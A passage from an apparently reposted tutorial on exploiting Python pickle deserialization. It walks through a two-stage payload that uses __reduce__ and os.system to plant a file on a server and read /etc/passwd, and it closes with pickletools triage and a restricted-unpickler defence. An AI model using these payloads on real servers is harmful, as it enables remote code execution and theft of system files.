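# pickletools.dis only disassembles the opcode stream; nothing runs.
out = io.StringIO()
pickletools.dis(blob, out=out)
listing = out.getvalue()
print(listing)

# The listing contains a GLOBAL / STACK_GLOBAL opcode resolving
# os.system, followed by REDUCE ("call this callable on load").
assert 'system' in listing and 'REDUCE' in listing
```

This is a cheap way to triage a suspicious pickle file before ever passing it to pickle.loads.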
Let's write an evil_rick_shell.py file with the following content:

def do_evil():
    with open("/etc/passwd") as f:
        data = f.readlines()
    return [{"date": line, "dimension": "//", "planet": "//", "morty": "//"} for line in data]

Now, let's create a pickle that will write this file on the server:

import pickle
import base64
import os

class EvilRick1(object):
    def __reduce__(self):
        with open("evil_rick_shell.py") as f:
            data = f.readlines()
        shell = "\n".join(data)
        return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),)

prick = pickle.dumps(EvilRick1())
if os.name == 'nt':  # Windows trick
    prick = prick[0:3] + b"os" + prick[5:]
pickle_prick = base64.b64encode(prick).decode()
with open("evil_rick1.data", "w") as file:
    file.write(pickle_prick)

This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not match the adventures signature, uploading evil_rick1.data will return a 500 error, but by then it is too late: the command has already run.

2. Generating a payload to execute a payload
Now let's create a pickle object that will call the evil_rick_shell.do_evil callable:

import pickle
import base64
import evil_rick_shell

class EvilRick2(object):
    def __reduce__(self):
        return evil_rick_shell.do_evil, ()

prick = pickle.dumps(EvilRick2())
pickle_prick = base64.b64encode(prick).decode()
with open("evil_rick2.data", "w") as file:
    file.write(pickle_prick)

Since the evil_rick_shell.do_evil callable matches the adventures signature, uploading evil_rick2.data should succeed, and each line of the /etc/passwd file will be added as an adventure.

Build it all together
Once both payloads are generated, simply upload the first one, then the second one: the do_evil() payload is triggered, and the content of the /etc/passwd file is displayed as adventures.
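The two-stage design is needed because a pickle only stores a reference (module name plus attribute name) to evil_rick_shell.do_evil; the module itself must be importable on the loading side. The following experiment is my own illustration, not from the article: it patches a pickled function reference to point at a non-existent module and shows that the load then fails, which is exactly why stage 1 has to plant evil_rick_shell.py on the server first.

```python
import pickle

# Pickling a function stores only its module and qualified name.
blob = pickle.dumps(len)  # serialized as a reference to builtins.len
assert b"builtins" in blob

# Patch the module name to one that does not exist. The replacement
# has the same length, so the length-prefixed string opcode stays valid.
broken = blob.replace(b"builtins", b"missing8")

try:
    pickle.loads(broken)
    raised = False
except ImportError:  # ModuleNotFoundError is a subclass of ImportError
    raised = True

# The load fails: the referenced module must exist wherever the
# pickle is loaded.
assert raised
```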
Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil being executed on Rick's server.

How to protect against it
It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret a forged object with malicious code inside.

I hope you enjoyed this article, and have fun with it!

Dan Lousqui
IT Security Senior Consultant, developer, open source enthusiast, and so much more!

Sursa: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
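If a project cannot drop pickle entirely for data it controls, the Python documentation describes a mitigation: subclass pickle.Unpickler and override find_class so that only a whitelist of harmless globals can ever be resolved. The sketch below follows that documented pattern; the helper names (SAFE_BUILTINS, restricted_loads) are my own, not from the article.

```python
import io
import pickle

# Whitelist of harmless built-in types that plain data pickles may reference.
SAFE_BUILTINS = {"list", "dict", "set", "frozenset", "tuple",
                 "str", "bytes", "int", "float", "complex", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # find_class is consulted for every GLOBAL opcode in the stream;
        # refusing here blocks os.system & friends before they are called.
        if module == "builtins" and name in SAFE_BUILTINS:
            import builtins
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data still round-trips fine...
safe = restricted_loads(pickle.dumps({"friends": ["alice", "bob"]}))
assert safe == {"friends": ["alice", "bob"]}
```

Note that this only narrows the attack surface; the author's advice still stands: for untrusted input, a data-only format such as JSON with explicit conversion functions is the safer default.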